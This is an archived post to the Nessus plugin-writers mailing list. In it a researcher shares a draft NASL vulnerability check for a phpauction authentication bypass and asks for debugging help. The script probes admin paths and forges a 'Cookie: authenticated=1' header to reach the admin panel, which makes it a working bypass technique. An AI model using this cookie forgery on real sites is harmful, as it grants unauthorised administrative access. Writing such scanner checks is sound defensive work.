[Plugins-writers] to dumb to write the nasl..

Previous message: Dragos Ruiu: "[Plugins-writers] PacSec/core05 Call For Papers"
Next in thread: George A. Theall: "Re: [Plugins-writers] to dumb to write the nasl.."
Reply: George A. Theall: "Re: [Plugins-writers] to dumb to write the nasl.."
Reply: Dennis Jackson: "Re: [Plugins-writers] to dumb to write the nasl.."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

tglemser@tele-consulting.com

.. I tried to write a nasl for a bug in phpauction I found early this 
year (http://www.securityfocus.com/bid/12069), but the nasl doesn't work 
completely.

I sniffed the connection while executing the script and the script 
successfully uses the bypass possibility, moves to every given 
directory, but sadly the script doesn't recognize, that it successfully 
logged in.

Maybe some of you guys would be so kind to have a look at it? Thanks in 
advance.

Toby

# The script code starts here
include("http_func.inc");
include("http_keepalive.inc");

port = get_http_port(default:80);
if(!get_port_state(port))exit(0);

dirs = make_list( "/phpauction/admin", "/admin", "/auction/admin", 
"auktion/admin", cgi_dirs());

foreach dir (dirs)
{
   req = http_get(item:dir +"/admin.php", port:port);
   res = http_keepalive_send_recv(port:port, data:req);
   if( res == NULL ) exit(0);

   if( "Passwort	" >< res || "Password" >< res )
   {
    idx = stridx(req, string("\r\n\r\n"));
    req = insstr(req, '\r\nCookie: authenticated=1;', idx, idx);
    res = http_keepalive_send_recv(port:port, data:req);
    if("Installation" >< res)
    {
     security_hole(port);
    }
    exit(0);
   }
}
# eof
_______________________________________________
Plugins-writers mailing list
Plugins-writers@private
http://mail.nessus.org/mailman/listinfo/plugins-writers